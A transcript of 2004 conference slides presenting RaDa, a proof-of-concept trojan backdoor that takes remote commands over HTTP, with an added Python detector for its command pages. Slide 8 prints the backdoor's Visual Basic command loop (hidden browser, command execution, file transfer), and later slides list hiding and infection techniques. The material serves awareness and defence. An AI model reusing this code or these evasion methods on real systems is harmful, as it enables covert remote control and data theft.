Malware RADA
Transcript of "Malware RADA"

Slide 1. RaDa: a “new” trojan backdoor
   Jorge Ortiz & Raúl Siles
   jorge.ortiz@hp.com, raul.siles@hp.com
   FIST Conference, Madrid, October 2004

Slide 2. Agenda
   • Introduction
   • Healthy Environment
   • Remote Control (RaDa Demo)
   • One step beyond
   • Getting it in
   • Countermeasures

Slide 3. Intro
   • Awareness of trojans used for remote control, and of protection measures.
   • Most concepts are based on Setiri (R. Temmingh & H. Meer, BH 2002).
   • Implemented by Raul Siles, David Perez & Jorge Ortiz.
   • Honeynet Project SOTM in September (thanks Lance and Ed!).

Slide 4. A healthy environment
   • You have done a pretty good job:
     – Policy & procedures
     – Firewall (ingress and egress filters)
     – IDS
     – Secure configurations
     – AV and personal firewalls
   • But problems appear…

Slide 5. A healthy environment
   [Diagram: Internet – Router – Proxy/Firewall – IDS – Secure system]

Slide 6. Remote Control
   • Let’s think for a minute that the intruder has been able to install a program.
   • We shall cover how it gets in later.

Slide 7. Remote Control: implementation
   • RaDa:
     – Very easy to do
     – A lot of cut-and-paste code (Google knows how to do it!)
     – Visual Basic, Perl…
     – Uses the Internet Explorer installed on the system
     – HTTP communications
Slide 8. RaDa: implementation
   (The slide shows the main loop in two columns; reassembled here in reading order.)

    Sub RaDa_Run()
        ' Open an invisible Internet Explorer instance
        Set oExplorer = CreateObject("InternetExplorer.Application")
        oExplorer.Visible = 0

        ' Load the commands file from the controller
        sCommandsURL = sServerURL & "/" & sCommandsFile
        oExplorer.Navigate sCommandsURL

        ' Loop through the commands (input fields in the first form)
        For Each Element In oExplorer.Document.Forms(0).Elements
            Select Case Element.Name
                Case "exe"
                    vRetValue = CommandExe(Element.Value)
                Case "get"
                    vRetValue = CommandGet(Element.Value)
                Case "put"
                    vRetValue = CommandPut(Element.Value)
                Case Else
                    ' Ignore unknown command
            End Select
        Next Element

        ' Close Internet Explorer and release the object variable "oExplorer"
        oExplorer.Application.Quit
        Set oExplorer = Nothing
    End Sub
Slide 9. RaDa: How It Works
   [Diagram: Intruder – Controller – RaDa, over HTTP/HTTPS]
   1. Intruder publishes order
   2. RaDa opens invisible IE
   3. IE sends GET to Ctrler
   4. Ctrler sends command back to RaDa
   5. RaDa execs command & sends response with POST
   6. Intruder retrieves results from Ctrler

Slide 10. Demo – RaDa: Command Exec
   1. RaDa/IE retrieves command from Ctrler with GET
   2. Parse page: <input type="text" name="exe" value="…">
   3. Exec command with Cmd.exe

Slide 11. Demo – RaDa: File Download
   1. RaDa/IE retrieves command from Ctrler with GET
   2. Parse page: <input type="text" name="get" value="…">
   3. Download file from Ctrler with POST
   4. UUdecode and save it

Slide 12. Demo – RaDa: Screen Capture
   1. RaDa/IE retrieves command from Ctrler with GET
   2. Parse page: <input type="text" name="screenshot" value="…">
   3. Capture screen with selected name

Slide 13. Demo – RaDa: File Upload
   1. RaDa/IE retrieves command from Ctrler with GET
   2. Parse page: <input type="text" name="put" value="…">
   3. Send back contents with POST
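Slides 9 through 13 describe the command channel: an ordinary HTML page whose form inputs carry the command in the name attribute (exe, get, put, screenshot) and its argument in the value attribute. The following detector, added here as an example and not part of RaDa or the presentation, walks every form in a fetched or proxy-captured page the same way RaDa walks Forms(0).Elements and reports any input whose name is one of those commands; the command set and the sample page are constructed from the slides.

```python
"""Flag RaDa-style command pages: HTML forms whose <input> names are
commands (exe/get/put/screenshot) and whose values are the arguments.
Added example for detection; the command set is taken from the slides."""
from html.parser import HTMLParser

RADA_COMMANDS = {"exe", "get", "put", "screenshot"}


class FormInputCollector(HTMLParser):
    """Collect (form_index, name, value) for <input> elements inside
    <form> elements, mirroring how RaDa reads Forms(n).Elements."""

    def __init__(self):
        super().__init__()
        self.form_index = -1    # index of the form currently open
        self.in_form = False
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.form_index += 1
            self.in_form = True
        elif tag == "input" and self.in_form:
            a = dict(attrs)
            # html.parser lowercases attribute names; a bare attribute
            # yields None, so normalise to an empty string
            self.inputs.append((self.form_index,
                                (a.get("name") or "").lower(),
                                a.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False


def find_rada_commands(html):
    """Return [(form_index, command, argument)] for every input whose
    name is a RaDa command; an empty list means nothing suspicious."""
    p = FormInputCollector()
    p.feed(html)
    p.close()
    return [(i, n, v) for i, n, v in p.inputs if n in RADA_COMMANDS]


# Constructed sample controller page (not a real RaDa page): one exe
# command in the first form, a harmless field, and a put in a second
# form that RaDa's Forms(0) loop would ignore but a defender should see.
SAMPLE_PAGE = """<html><body>
<form action="/upload" method="post">
<input type="text" name="exe" value="ipconfig /all">
<input type="text" name="comment" value="nothing here">
</form>
<form><input type="text" name="put" value="c:\\secret.txt"></form>
</body></html>"""

if __name__ == "__main__":
    for idx, cmd, arg in find_rada_commands(SAMPLE_PAGE):
        print(f"form {idx}: suspicious field {cmd}={arg!r}")
```

Feeding the parser response bodies from a web proxy log is enough to surface this channel, because the page that carries the command is plain HTML retrieved with a normal GET from the user's own browser.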
Slide 14. Demo – RaDa: hiding techniques
   • No application in Task Manager
   • Process name
   • Packed
   • HTTP through IE using HTML
   • Misleading info
   • VMware detection

Slide 15. One Step Beyond
   • Strong authentication of commands (GPG)
   • Blog/Wiki
   • Multi-agent management console
   • Other channels (mail, DNS, ping, FTP)

Slide 16. Getting it in
   • Zero-day exploit
   • Ask for help:
     – Mail attachment
     – Download
     – Social engineering
   • Insider

Slide 17. Countermeasures
   • User awareness
   • Baselines (processes, memory…)
   • Restrict web access
   • Update AV signatures frequently
   • Signed executables
   • Behavioral vs. signature analysis

Slide 18. Scan of the Month
   • Goal:
     – Improve the state of the art in Windows malware reverse engineering
   • Honeynet Project:
     – http://www.honeynet.org/scans/

Slide 19. That’s all folks
   • Thank you!
   • Any questions?
   FIST Conference, Madrid, October 2004

Slide 20. Attribution-NonCommercial-NoDerivs 2.0
   You are free: to copy, distribute, display, and perform the work.
   Under the following conditions:
   • Attribution. You must give the original author credit.
   • Noncommercial. You may not use this work for commercial purposes.
   • No Derivative Works. You may not alter, transform, or build upon this work.
   For any reuse or distribution, you must make clear to others the license terms of this work.
   Any of these conditions can be waived if you get permission from the author.
   Your fair use and other rights are in no way affected by the above.
   This is a human-readable summary of http://creativecommons.org/licenses/by-nc-nd/2.0/.